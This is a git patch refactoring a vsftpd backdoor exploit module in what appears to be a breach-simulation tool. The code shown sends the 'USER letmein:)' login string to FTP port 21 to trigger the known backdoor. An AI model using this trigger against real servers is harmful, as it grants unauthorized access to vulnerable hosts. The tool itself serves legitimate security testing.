From dade4daad29e1e10b0217dc8ab73ba701a11eb1f Mon Sep 17 00:00:00 2001 From: Dhayalan Date: Tue, 12 Mar 2019 12:37:09 +0100 Subject: [PATCH] Update vsftpd.py Removed unused imports, removed hardcoded username and password. Removed EXPLOIT_TYPE Removed NONE in tatget_os_type Reduced time to sleep from 2 to 1 --- monkey/infection_monkey/exploit/vsftpd.py | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index 11a5b3297..5819d7d44 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -1,15 +1,11 @@ import logging from logging import getLogger -import time - import paramiko import StringIO import socket -import sys import time -import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth from infection_monkey.model import MONKEY_ARG @@ -23,12 +19,14 @@ __author__ = 'D3fa1t' FTP_PORT = 21 TRANSFER_UPDATE_RATE = 15 -COMMAND = "uname -a" +USERNAME = b'USER letmein:)\n' +PASSWORD = b'PASS please\n' + + class VSFTPDExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', None] - EXPLOIT_TYPE = ExploitType.OTHER - + _TARGET_OS_TYPE = ['linux'] + def __init__(self, host): self._update_timestamp = 0 super(VSFTPDExploiter, self).__init__(host) @@ -41,9 +39,9 @@ class VSFTPDExploiter(HostExploiter): ftp_socket.connect((self.host.ip_addr, FTP_PORT)) # Attempt to login to trigger backdoor - ftp_socket.send(b'USER letmein:)\n') - ftp_socket.send(b'PASS please\n') - time.sleep(2) + ftp_socket.send(USERNAME) + ftp_socket.send(PASSWORD) + time.sleep(1) ftp_socket.close() LOG.info('[+] Triggered backdoor')